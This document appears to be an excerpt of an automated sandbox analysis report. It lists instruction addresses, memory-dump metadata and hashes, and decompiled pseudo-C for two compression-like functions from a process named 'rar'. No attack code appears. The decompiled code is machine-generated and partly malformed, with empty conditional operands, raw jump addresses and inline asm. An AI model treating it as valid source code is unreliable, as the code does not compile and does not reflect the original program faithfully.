                                                                                                            0x7ff650b61c6a
                                                                                                            0x7ff650b61c71
                                                                                                            0x7ff650b61c79
                                                                                                            0x7ff650b61c80
                                                                                                            0x7ff650b61c92
                                                                                                            0x7ff650b61c9b
                                                                                                            0x7ff650b61cb0
                                                                                                            0x7ff650b61cb3
                                                                                                            0x7ff650b61cba
                                                                                                            0x7ff650b61cbc
                                                                                                            0x7ff650b61cc1
                                                                                                            0x7ff650b61ccc
                                                                                                            0x7ff650b61cd6
                                                                                                            0x7ff650b61cdc
                                                                                                            0x7ff650b61ce3
                                                                                                            0x7ff650b61ce8
                                                                                                            0x7ff650b61cea
                                                                                                            0x7ff650b61cf4
                                                                                                            0x7ff650b61cf6
                                                                                                            0x7ff650b61cf6
                                                                                                            0x7ff650b61cfd
                                                                                                            0x7ff650b61d0e
                                                                                                            0x7ff650b61d15
                                                                                                            0x7ff650b61d15
                                                                                                            0x7ff650b61d1d
                                                                                                            0x7ff650b61d26
                                                                                                            0x7ff650b61d2b
                                                                                                            0x7ff650b61d30
                                                                                                            0x7ff650b61d37
                                                                                                            0x7ff650b61d3d
                                                                                                            0x7ff650b61d43
                                                                                                            0x7ff650b61d47
                                                                                                            0x7ff650b61d4a
                                                                                                            0x7ff650b61d52
                                                                                                            0x7ff650b61d5b
                                                                                                            0x7ff650b61d63
                                                                                                            0x7ff650b61d6c
                                                                                                            0x7ff650b61d72
                                                                                                            0x7ff650b61d7c
                                                                                                            0x7ff650b61d88
                                                                                                            0x7ff650b61d94
                                                                                                            0x7ff650b61da0
                                                                                                            0x7ff650b61da8
                                                                                                            0x7ff650b61dad
                                                                                                            0x7ff650b61db9
                                                                                                            0x7ff650b61dbb
                                                                                                            0x7ff650b61dc1
                                                                                                            0x7ff650b61dc6
                                                                                                            0x7ff650b61dd4
                                                                                                            0x7ff650b61dd6
                                                                                                            0x7ff650b61ddf
                                                                                                            0x7ff650b61de1
                                                                                                            0x7ff650b61de3
                                                                                                            0x7ff650b61de6
                                                                                                            0x7ff650b61df2
                                                                                                            0x7ff650b61df8
                                                                                                            0x7ff650b61e01
                                                                                                            0x7ff650b61e06
                                                                                                            0x7ff650b61e17
                                                                                                            0x7ff650b61e1b
                                                                                                            0x7ff650b61e28
                                                                                                            0x7ff650b61e2a
                                                                                                            0x7ff650b61e30
                                                                                                            0x7ff650b61e39
                                                                                                            0x7ff650b61e42
                                                                                                            0x7ff650b61e44
                                                                                                            0x7ff650b61e56
                                                                                                            0x7ff650b61e58
                                                                                                            0x7ff650b61e6d
                                                                                                            0x7ff650b61e74
                                                                                                            0x7ff650b61e82
                                                                                                            0x7ff650b61e8b
                                                                                                            0x7ff650b61e91
                                                                                                            0x7ff650b61e93
                                                                                                            0x7ff650b61e95
                                                                                                            0x7ff650b61e9a
                                                                                                            0x7ff650b61e9c
                                                                                                            0x7ff650b61eae
                                                                                                            0x7ff650b61eb0
                                                                                                            0x7ff650b61ec5
                                                                                                            0x7ff650b61ed2
                                                                                                            0x7ff650b61ede
                                                                                                            0x7ff650b61ee4
                                                                                                            0x7ff650b61eeb
                                                                                                            0x7ff650b61eed
                                                                                                            0x7ff650b61ef9
                                                                                                            0x7ff650b61eff
                                                                                                            0x7ff650b61f0b
                                                                                                            0x7ff650b61f16
                                                                                                            0x7ff650b61f1a
                                                                                                            0x7ff650b61f1c
                                                                                                            0x7ff650b61f2d
                                                                                                            0x7ff650b61f32
                                                                                                            0x7ff650b61f39
                                                                                                            0x7ff650b61f46
                                                                                                            0x7ff650b61f4b
                                                                                                            0x7ff650b61f52
                                                                                                            0x7ff650b61f62
                                                                                                            0x7ff650b61f67
                                                                                                            0x7ff650b61f6e
                                                                                                            0x7ff650b61f7e
                                                                                                            0x7ff650b61fa5

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 09a02d79cb9c7364ba1a3b04f932aa3667dc3782b420dc3ecb5c1314669150e1
                                                                                                            • Instruction ID: 823c7e2d534b6bffaeaeafcbe360d763f88a8be46de00f964b3902139932d819
                                                                                                            • Opcode Fuzzy Hash: 09a02d79cb9c7364ba1a3b04f932aa3667dc3782b420dc3ecb5c1314669150e1
                                                                                                            • Instruction Fuzzy Hash: 80A11473E0819366FB25DA29D4847BD2680EB52744F5D8931DE4FAB782DE3FE8418740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B21648 Relevance: .2, Instructions: 247COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E00007FF67FF650B21648(long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __r9) {
				void* _t83;
				intOrPtr _t89;
				void* _t94;
				void* _t100;
				void* _t101;
				intOrPtr _t104;
				void* _t106;
				intOrPtr _t111;
				void* _t186;
				signed long long _t187;
				void* _t200;
				long long _t204;
				void* _t205;
				intOrPtr* _t208;
				signed long long _t209;
				intOrPtr* _t214;
				void* _t220;
				void* _t223;
				void* _t227;
				void* _t229;
				void* _t230;
				void* _t232;
				signed long long _t233;
				void* _t235;
				void* _t237;
				void* _t239;
				void* _t240;
				void* _t242;
				signed long long _t244;
				void* _t246;
				void* _t248;
				void* _t250;

				_t237 = __r9;
				_t220 = __rdx;
				_t204 = __rbx;
				_t186 = _t232;
				 *((long long*)(_t186 + 8)) = __rbx;
				 *((long long*)(_t186 + 0x18)) = __rsi;
				 *((long long*)(_t186 + 0x20)) = __rdi;
				_t230 = _t186 - 0x5f;
				_t233 = _t232 - 0xe0;
				_t187 =  *0x50b978f0; // 0x27db226282f1
				 *(_t230 + 0x2f) = _t187 ^ _t233;
				_t227 = __rdx + 0x6f8;
				_t8 = _t220 + 0x50; // 0x50
				r8d = _t8;
				E00007FF67FF650B6C1A0(_t83, 0, _t233 + 0x20, __rdx, _t235);
				r9d = 0x1ae;
				r10d = 0x87;
				_t9 = _t220 + 1; // 0x88
				r13d = _t9;
				if (0 - 0x1ac >= 0) goto 0x50b2175b;
				_t104 =  *((intOrPtr*)(0 + _t227));
				if (_t104 != 0) goto 0x50b21701;
				if ( *((intOrPtr*)(0 + _t227 + 1)) != _t104) goto 0x50b21701;
				if ( *((intOrPtr*)(0 + _t227 + 2)) != _t104) goto 0x50b21701;
				if (3 - _t237 >= 0) goto 0x50b216f8;
				if ( *((char*)(3 + _t227)) != 0) goto 0x50b216ed;
				if (0 - r10d >= 0) goto 0x50b216ed;
				_t106 = 0 + r13d;
				if (3 - _t237 < 0) goto 0x50b216d4;
				if (_t106 - 7 <= 0) goto 0x50b216f8;
				 *((intOrPtr*)(_t230 - 0x3d)) =  *((intOrPtr*)(_t230 - 0x3d)) + r13d;
				goto 0x50b216fc;
				 *((intOrPtr*)(_t230 - 0x41)) =  *((intOrPtr*)(_t230 - 0x41)) + r13d;
				goto 0x50b21767;
				if (3 <= 0) goto 0x50b2175b;
				if (_t106 !=  *((intOrPtr*)(3 + _t227 - 1))) goto 0x50b2175b;
				if (_t106 !=  *((intOrPtr*)(3 + _t227 + 1))) goto 0x50b2175b;
				if (_t106 !=  *((intOrPtr*)(3 + _t246 + _t227 + 2))) goto 0x50b2175b;
				r8d = 0;
				if (3 - _t237 >= 0) goto 0x50b21755;
				_t208 = 3 + _t227;
				if ( *_t208 !=  *((intOrPtr*)(_t208 - 1))) goto 0x50b21749;
				if (r8d - r10d >= 0) goto 0x50b21749;
				_t209 = _t208 + _t246;
				r8d = r8d + r13d;
				if (_t209 - _t227 - _t237 < 0) goto 0x50b21729;
				if (r8d - 7 <= 0) goto 0x50b21755;
				 *((intOrPtr*)(_t230 - 0x45)) =  *((intOrPtr*)(_t230 - 0x45)) + r13d;
				goto 0x50b216fc;
				 *((intOrPtr*)(_t230 - 0x49)) =  *((intOrPtr*)(_t230 - 0x49)) + r13d;
				goto 0x50b216fc;
				 *((intOrPtr*)(_t233 + 0x20 + _t209 * 4)) =  *((intOrPtr*)(_t233 + 0x20 + _t209 * 4)) + r13d;
				if (3 + r13d - r13d + 3 + r13d + r13d - r9d < 0) goto 0x50b216a5;
				E00007FF67FF650B385A0(0x14, 3, __rbx, _t233 + 0x20, _t230 + 0x17, _t230 - 0x39, _t239, _t240);
				r15d = 0;
				_t244 = __rdx + 0x18;
				r14d = 0;
				if (0 - 0x14 >= 0) goto 0x50b217eb;
				_t223 = _t230 + 0x17;
				if ( *((char*)(_t223 + _t204)) != 0) goto 0x50b217c3;
				if (_t204 - 0x11 >= 0) goto 0x50b217c3;
				r14d = r14d + r13d;
				_t205 = _t204 + _t246;
				if (0 + r13d - 0x14 < 0) goto 0x50b217a9;
				if (_t205 - 3 < 0) goto 0x50b217eb;
				_t44 = _t223 + 0xb; // 0xf
				r8d = _t44;
				E00007FF67FF650B472B0(4, _t205, _t244, _t227, _t250);
				_t45 = _t248 - 2; // -2
				r8d = _t45;
				goto 0x50b2180e;
				if (( *(_t230 + _t250 - 1 + _t205 + 0x17) & 0x000000ff) != 0xf) goto 0x50b2180b;
				_t48 = _t223 + 0xb; // 0xf
				r8d = _t48;
				_t89 = E00007FF67FF650B472B0(4, _t205, _t244, _t227, _t248);
				r8d = 0;
				goto 0x50b2180e;
				r8d = _t89;
				E00007FF67FF650B472B0(4, _t205, _t244, _t227, _t246);
				if (0xffffffffffffffff + r14d + r13d - 0x14 < 0) goto 0x50b21793;
				r14d = 0x1ae;
				_t49 = _t205 + 7; // 0x7
				r15d = _t49;
				if (0 - 0x1ac >= 0) goto 0x50b21918;
				_t111 =  *((intOrPtr*)(0 + _t227));
				if (_t111 != 0) goto 0x50b218b2;
				if ( *((intOrPtr*)(0 + _t227 + 1)) != _t111) goto 0x50b218b2;
				if ( *((intOrPtr*)(0 + _t227 + 2)) != _t111) goto 0x50b218b2;
				goto 0x50b21879;
				if ( *((char*)(3 + _t227)) != 0) goto 0x50b2187e;
				if (0 - 0x87 >= 0) goto 0x50b2187e;
				if (3 - _t248 < 0) goto 0x50b21862;
				if (0 + r13d - r15d > 0) goto 0x50b2189a;
				r8d =  *((intOrPtr*)(_t230 + 0xf));
				E00007FF67FF650B472B0( *(_t230 + 0x29) & 0x000000ff, _t205, _t244, _t227, _t242);
				goto 0x50b218ad;
				r8d =  *((intOrPtr*)(_t230 + 0x13));
				E00007FF67FF650B472B0( *(_t230 + 0x2a) & 0x000000ff, _t205, _t244, _t227, _t229);
				_t100 = 3 + r13d - r13d;
				goto 0x50b21928;
				if (_t100 <= 0) goto 0x50b21918;
				if (_t111 !=  *((intOrPtr*)(3 + _t227 - 1))) goto 0x50b21918;
				if (_t111 !=  *((intOrPtr*)(3 + _t227 + 1))) goto 0x50b21918;
				if (_t111 !=  *((intOrPtr*)(3 + _t246 + _t227 + 2))) goto 0x50b21918;
				_t101 = _t100 + 3;
				_t200 = _t101;
				if (_t200 - _t248 >= 0) goto 0x50b218fc;
				_t214 = _t200 + _t227;
				if ( *_t214 !=  *((intOrPtr*)(_t214 - 1))) goto 0x50b218fc;
				if (0 - 0x87 >= 0) goto 0x50b218fc;
				if (_t214 + _t246 - _t227 - _t248 < 0) goto 0x50b218d9;
				if (0 + r13d - r15d > 0) goto 0x50b2190e;
				r8d =  *((intOrPtr*)(_t230 + 7));
				goto 0x50b2188e;
				r8d =  *((intOrPtr*)(_t230 + 0xb));
				goto 0x50b218a2;
				r8d =  *((intOrPtr*)(_t230 + _t244 * 4 - 0x39));
				_t94 = E00007FF67FF650B472B0( *(_t230 + _t244 + 0x17) & 0x000000ff, _t205, _t244, _t227);
				if (_t101 + r13d + r13d - r14d < 0) goto 0x50b21836;
				return E00007FF67FF650B69D10(_t94,  *(_t101 + r13d + _t227) & 0x000000ff,  *(_t230 + 0x2f) ^ _t233);
			}



































                                                                                                            0x7ff650b21648
                                                                                                            0x7ff650b21648
                                                                                                            0x7ff650b21648
                                                                                                            0x7ff650b21648
                                                                                                            0x7ff650b2164b
                                                                                                            0x7ff650b2164f
                                                                                                            0x7ff650b21653
                                                                                                            0x7ff650b21660
                                                                                                            0x7ff650b21664
                                                                                                            0x7ff650b2166b
                                                                                                            0x7ff650b21675
                                                                                                            0x7ff650b2167c
                                                                                                            0x7ff650b2168a
                                                                                                            0x7ff650b2168a
                                                                                                            0x7ff650b2168e
                                                                                                            0x7ff650b21695
                                                                                                            0x7ff650b2169b
                                                                                                            0x7ff650b216a1
                                                                                                            0x7ff650b216a1
                                                                                                            0x7ff650b216ab
                                                                                                            0x7ff650b216b4
                                                                                                            0x7ff650b216b9
                                                                                                            0x7ff650b216bf
                                                                                                            0x7ff650b216c5
                                                                                                            0x7ff650b216d2
                                                                                                            0x7ff650b216d8
                                                                                                            0x7ff650b216dd
                                                                                                            0x7ff650b216df
                                                                                                            0x7ff650b216eb
                                                                                                            0x7ff650b216f0
                                                                                                            0x7ff650b216f2
                                                                                                            0x7ff650b216f6
                                                                                                            0x7ff650b216f8
                                                                                                            0x7ff650b216ff
                                                                                                            0x7ff650b21703
                                                                                                            0x7ff650b21709
                                                                                                            0x7ff650b2170f
                                                                                                            0x7ff650b21715
                                                                                                            0x7ff650b2171a
                                                                                                            0x7ff650b21723
                                                                                                            0x7ff650b21725
                                                                                                            0x7ff650b2172e
                                                                                                            0x7ff650b21733
                                                                                                            0x7ff650b21735
                                                                                                            0x7ff650b21738
                                                                                                            0x7ff650b21747
                                                                                                            0x7ff650b2174d
                                                                                                            0x7ff650b2174f
                                                                                                            0x7ff650b21753
                                                                                                            0x7ff650b21755
                                                                                                            0x7ff650b21759
                                                                                                            0x7ff650b21762
                                                                                                            0x7ff650b2176d
                                                                                                            0x7ff650b21785
                                                                                                            0x7ff650b2178c
                                                                                                            0x7ff650b2178f
                                                                                                            0x7ff650b21793
                                                                                                            0x7ff650b2179d
                                                                                                            0x7ff650b217a6
                                                                                                            0x7ff650b217ad
                                                                                                            0x7ff650b217b3
                                                                                                            0x7ff650b217b5
                                                                                                            0x7ff650b217b8
                                                                                                            0x7ff650b217c1
                                                                                                            0x7ff650b217c7
                                                                                                            0x7ff650b217d1
                                                                                                            0x7ff650b217d1
                                                                                                            0x7ff650b217d5
                                                                                                            0x7ff650b217dc
                                                                                                            0x7ff650b217dc
                                                                                                            0x7ff650b217e9
                                                                                                            0x7ff650b217f3
                                                                                                            0x7ff650b217fd
                                                                                                            0x7ff650b217fd
                                                                                                            0x7ff650b21801
                                                                                                            0x7ff650b21806
                                                                                                            0x7ff650b21809
                                                                                                            0x7ff650b2180b
                                                                                                            0x7ff650b21816
                                                                                                            0x7ff650b21824
                                                                                                            0x7ff650b2182c
                                                                                                            0x7ff650b21832
                                                                                                            0x7ff650b21832
                                                                                                            0x7ff650b2183c
                                                                                                            0x7ff650b21845
                                                                                                            0x7ff650b2184a
                                                                                                            0x7ff650b21850
                                                                                                            0x7ff650b21856
                                                                                                            0x7ff650b21860
                                                                                                            0x7ff650b21866
                                                                                                            0x7ff650b2186e
                                                                                                            0x7ff650b2187c
                                                                                                            0x7ff650b21884
                                                                                                            0x7ff650b2188a
                                                                                                            0x7ff650b2188e
                                                                                                            0x7ff650b21898
                                                                                                            0x7ff650b2189e
                                                                                                            0x7ff650b218a2
                                                                                                            0x7ff650b218ad
                                                                                                            0x7ff650b218b0
                                                                                                            0x7ff650b218b4
                                                                                                            0x7ff650b218ba
                                                                                                            0x7ff650b218c0
                                                                                                            0x7ff650b218c6
                                                                                                            0x7ff650b218c8
                                                                                                            0x7ff650b218cd
                                                                                                            0x7ff650b218d3
                                                                                                            0x7ff650b218d5
                                                                                                            0x7ff650b218de
                                                                                                            0x7ff650b218e6
                                                                                                            0x7ff650b218fa
                                                                                                            0x7ff650b21902
                                                                                                            0x7ff650b21908
                                                                                                            0x7ff650b2190c
                                                                                                            0x7ff650b21912
                                                                                                            0x7ff650b21916
                                                                                                            0x7ff650b21928
                                                                                                            0x7ff650b2192e
                                                                                                            0x7ff650b21939
                                                                                                            0x7ff650b2196b

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4fa33855e18ca4aaeee429cbb06a388f2c04a412cd8241f1cee23df7b2ce3ff6
                                                                                                            • Instruction ID: 242e5bd5a619ac2a7793dc98fa41ecbb52e8678dc5acc7731324096b5afd140e
                                                                                                            • Opcode Fuzzy Hash: 4fa33855e18ca4aaeee429cbb06a388f2c04a412cd8241f1cee23df7b2ce3ff6
                                                                                                            • Instruction Fuzzy Hash: 42A11756F0828366FB318B1198D03BD2A92BBA3748F5D4935C94FA7785CD3FE5458700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B3F7A0 Relevance: .2, Instructions: 239COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E00007FF67FF650B3F7A0(signed int __rcx, signed int __rdx, signed int* __r9, void* __r11) {
				signed int _t94;
				void* _t133;
				void* _t144;
				signed int _t153;
				signed int _t166;
				void* _t184;
				void* _t192;
				signed long long _t195;
				signed long long _t198;
				void* _t199;
				void* _t201;
				signed int _t202;
				signed int _t203;
				long long _t209;
				long long _t214;
				void* _t217;
				void* _t218;
				signed int _t221;
				signed int* _t224;
				signed int _t226;
				void* _t228;
				long long _t229;
				signed int _t231;
				signed long long _t232;

				_t228 = __r11;
				_t217 = _t218 - 0xf;
				_t219 = _t218 - 0x98;
				_t195 =  *0x50b978f0; // 0x27db226282f1
				 *(_t217 - 1) = _t195 ^ _t218 - 0x00000098;
				__r9[0x11] = __r9[0x11] & 0x00000000;
				_t231 = r8d;
				__r9[0xa] = 0x50b96f40;
				_t94 =  *(_t217 + 0x77);
				 *((long long*)(_t217 - 0x31)) = __rdx;
				_t226 = __rdx;
				 *__r9 = 4;
				_t221 = _t231;
				__r9[0xc] = 0xd8;
				__r9[0x12] = r13d;
				__r9[0x14] = __rdx;
				__r9[1] = 1;
				__r9[2] = _t94;
				 *((intOrPtr*)(_t217 - 0x61)) = 0;
				 *(_t217 - 0x59) = _t231;
				if (_t94 <= 0) goto 0x50b3fa5a;
				_t209 = _t94;
				 *(_t217 - 0x49) =  *(_t217 - 0x49) & __rcx;
				r14d = _t94;
				 *((long long*)(_t217 - 0x29)) = _t209;
				 *((long long*)(_t217 - 0x41)) = _t214;
				 *((long long*)(_t217 - 0x39)) = 0x50b96f40;
				r8d = 4;
				_t201 = __rcx + 0x1a638;
				E00007FF67FF650B43454( *((intOrPtr*)(_t217 + 0x7f)), 0x50b96f40, _t201);
				 *(_t217 - 0x51) =  *(_t217 - 0x51) & 0x00000000;
				 *(_t217 - 0x59) =  *(_t217 - 0x59) & 0;
				r8d = 0;
				 *(_t217 - 0x65) = 0;
				 *((long long*)(_t217 - 0x11)) = _t209;
				r11d = 0;
				 *((intOrPtr*)(_t217 - 9)) = 0;
				r10d = 0;
				asm("xorps xmm0, xmm0");
				_t229 = _t214;
				asm("movups [ebp-0x21], xmm0");
				if (_t214 - _t231 >= 0) goto 0x50b3fa37;
				 *(_t217 - 0x59) = 0;
				r14d =  *(_t217 - 0x51);
				r8d =  *(_t229 +  *((intOrPtr*)(_t217 - 0x31))) & 0x000000ff;
				r9d = 0;
				 *((intOrPtr*)(_t217 - 0x61)) =  *((intOrPtr*)(_t217 - 0x61)) + 1;
				 *((intOrPtr*)(_t217 - 0x69)) = 0 - r8d;
				 *(_t217 - 0x51) = r8d;
				_t198 =  *((intOrPtr*)(__rcx + 0x1a5e8));
				_t202 =  *(_t217 - 0x49);
				_t166 = (_t201 + _t232 * 8 >> 3) - r8b;
				 *(_t202 + _t198) = _t166;
				_t203 = _t202 + 1;
				 *(_t217 - 0x49) = _t203;
				r14d = r8b - r14b;
				 *(_t217 - 0x65) = r14d;
				r14d =  *(_t217 - 0x21);
				r8d = _t198 * 8;
				asm("cdq");
				r14d = r14d + (r8d ^ _t166) - _t166;
				 *(_t217 - 0x21) = r14d;
				asm("cdq");
				 *((intOrPtr*)(_t217 - 0x1d)) =  *((intOrPtr*)(_t217 - 0x1d)) + (r8d -  *(_t217 - 0x59) ^ _t166) - _t166;
				asm("cdq");
				 *((intOrPtr*)(_t217 - 0x19)) =  *((intOrPtr*)(_t217 - 0x19)) + (_t221 + _t203 ^ _t166) - _t166;
				asm("cdq");
				 *((intOrPtr*)(_t217 - 0x15)) =  *((intOrPtr*)(_t217 - 0x15)) + (r8d -  *((intOrPtr*)(_t217 - 0x69)) ^ _t166) - _t166;
				asm("cdq");
				 *((intOrPtr*)(_t217 - 0x11)) =  *((intOrPtr*)(_t217 - 0x11)) + (_t221 + _t203 ^ _t166) - _t166;
				asm("cdq");
				 *((intOrPtr*)(_t217 - 0xd)) =  *((intOrPtr*)(_t217 - 0xd)) + (r8d - r9d ^ _t166) - _t166;
				asm("cdq");
				 *((intOrPtr*)(_t217 - 9)) =  *((intOrPtr*)(_t217 - 9)) + (__r9 + _t221 ^ _t166) - _t166;
				if ((sil & 0x0000001f) != 0) goto 0x50b3fa12;
				_t224 = _t217 - 0x1d;
				 *(_t217 - 0x21) =  *(_t217 - 0x21) & 0;
				_t71 = _t209 + 1; // 0x1
				r8d = _t71;
				_t153 =  *_t224;
				_t129 =  >=  ? 0 : r8d;
				 *_t224 =  *_t224 & 0x00000000;
				r8d = r8d + 1;
				_t168 =  >=  ? 0 : r8d;
				_t154 =  >=  ? r14d : _t153;
				r14d =  >=  ? r14d : _t153;
				_t184 = r8d - 7;
				if (_t184 < 0) goto 0x50b3f973;
				_t169 = ( >=  ? 0 : r8d) - 1;
				if (_t184 == 0) goto 0x50b3fa06;
				_t170 =  >=  ? 0 : r8d;
				if (_t184 == 0) goto 0x50b3f9f2;
				_t171 = ( >=  ? 0 : r8d) - 0xffffffffffffffff;
				if (_t184 == 0) goto 0x50b3f9e1;
				_t172 = ( >=  ? 0 : r8d) - 0xfffffffffffffffe;
				if (_t184 == 0) goto 0x50b3f9d3;
				_t173 = ( >=  ? 0 : r8d) - 0xfffffffffffffffd;
				if (_t184 == 0) goto 0x50b3f9c6;
				_t185 = ( >=  ? 0 : r8d) - 0xfffffffffffffffd - 1;
				if (( >=  ? 0 : r8d) - 0xfffffffffffffffd != 1) goto 0x50b3fa12;
				if (0 - 0x10 >= 0) goto 0x50b3fa12;
				goto 0x50b3fa12;
				_t74 = _t199 - 1; // -1
				_t131 =  <  ? 1 : _t74;
				_t144 =  <  ? 1 : _t74;
				goto 0x50b3fa01;
				_t75 = _t226 + 1; // 0x1
				_t133 =  >=  ? r10d : _t75;
				goto 0x50b3f9ed;
				_t76 = _t226 - 1; // -1
				_t135 =  <  ? r10d : _t76;
				r10d =  <  ? r10d : _t76;
				goto 0x50b3fa01;
				_t77 = _t228 + 1; // 0x1
				_t137 =  >=  ? r11d : _t77;
				r11d =  >=  ? r11d : _t77;
				goto 0x50b3fa12;
				if (r11d - 0xfffffff0 < 0) goto 0x50b3fa12;
				r11d = r11d - 1;
				r8d =  *(_t217 - 0x59);
				_t192 = _t229 +  *((intOrPtr*)(_t217 - 0x29)) - _t231;
				if (_t192 < 0) goto 0x50b3f88d;
				 *((long long*)(_t217 - 0x41)) =  *((intOrPtr*)(_t217 - 0x41)) + _t199;
				 *((long long*)(_t217 - 0x39)) =  *((intOrPtr*)(_t217 - 0x39)) - _t199;
				if (_t192 != 0) goto 0x50b3f83e;
				E00007FF67FF650B6BAF0();
				r8d = 3;
				r8d =  ==  ? 1 : r8d;
				return E00007FF67FF650B69D10(E00007FF67FF650B43454( *((intOrPtr*)(_t217 + 0x7f)) + r13d, _t198, __rcx + 0x1a638),  *((intOrPtr*)(_t217 - 0x61)),  *(_t217 - 1) ^ _t219);
			}



























                                                                                                            0x7ff650b3f7a0
                                                                                                            0x7ff650b3f7ad
                                                                                                            0x7ff650b3f7b2
                                                                                                            0x7ff650b3f7b9
                                                                                                            0x7ff650b3f7c3
                                                                                                            0x7ff650b3f7c7
                                                                                                            0x7ff650b3f7d3
                                                                                                            0x7ff650b3f7db
                                                                                                            0x7ff650b3f7df
                                                                                                            0x7ff650b3f7e7
                                                                                                            0x7ff650b3f7eb
                                                                                                            0x7ff650b3f7ee
                                                                                                            0x7ff650b3f7f5
                                                                                                            0x7ff650b3f7f8
                                                                                                            0x7ff650b3f807
                                                                                                            0x7ff650b3f80b
                                                                                                            0x7ff650b3f80f
                                                                                                            0x7ff650b3f813
                                                                                                            0x7ff650b3f817
                                                                                                            0x7ff650b3f81a
                                                                                                            0x7ff650b3f820
                                                                                                            0x7ff650b3f828
                                                                                                            0x7ff650b3f82b
                                                                                                            0x7ff650b3f82f
                                                                                                            0x7ff650b3f832
                                                                                                            0x7ff650b3f836
                                                                                                            0x7ff650b3f83a
                                                                                                            0x7ff650b3f841
                                                                                                            0x7ff650b3f849
                                                                                                            0x7ff650b3f84c
                                                                                                            0x7ff650b3f851
                                                                                                            0x7ff650b3f857
                                                                                                            0x7ff650b3f85c
                                                                                                            0x7ff650b3f85f
                                                                                                            0x7ff650b3f864
                                                                                                            0x7ff650b3f868
                                                                                                            0x7ff650b3f86b
                                                                                                            0x7ff650b3f86e
                                                                                                            0x7ff650b3f873
                                                                                                            0x7ff650b3f876
                                                                                                            0x7ff650b3f879
                                                                                                            0x7ff650b3f880
                                                                                                            0x7ff650b3f88f
                                                                                                            0x7ff650b3f892
                                                                                                            0x7ff650b3f899
                                                                                                            0x7ff650b3f89e
                                                                                                            0x7ff650b3f8a1
                                                                                                            0x7ff650b3f8aa
                                                                                                            0x7ff650b3f8b0
                                                                                                            0x7ff650b3f8bf
                                                                                                            0x7ff650b3f8ca
                                                                                                            0x7ff650b3f8d1
                                                                                                            0x7ff650b3f8d4
                                                                                                            0x7ff650b3f8d7
                                                                                                            0x7ff650b3f8dd
                                                                                                            0x7ff650b3f8e7
                                                                                                            0x7ff650b3f8ee
                                                                                                            0x7ff650b3f8f2
                                                                                                            0x7ff650b3f8f6
                                                                                                            0x7ff650b3f901
                                                                                                            0x7ff650b3f906
                                                                                                            0x7ff650b3f90e
                                                                                                            0x7ff650b3f912
                                                                                                            0x7ff650b3f917
                                                                                                            0x7ff650b3f921
                                                                                                            0x7ff650b3f926
                                                                                                            0x7ff650b3f92e
                                                                                                            0x7ff650b3f933
                                                                                                            0x7ff650b3f93a
                                                                                                            0x7ff650b3f93f
                                                                                                            0x7ff650b3f948
                                                                                                            0x7ff650b3f94d
                                                                                                            0x7ff650b3f954
                                                                                                            0x7ff650b3f959
                                                                                                            0x7ff650b3f960
                                                                                                            0x7ff650b3f968
                                                                                                            0x7ff650b3f96c
                                                                                                            0x7ff650b3f96f
                                                                                                            0x7ff650b3f96f
                                                                                                            0x7ff650b3f973
                                                                                                            0x7ff650b3f97c
                                                                                                            0x7ff650b3f97f
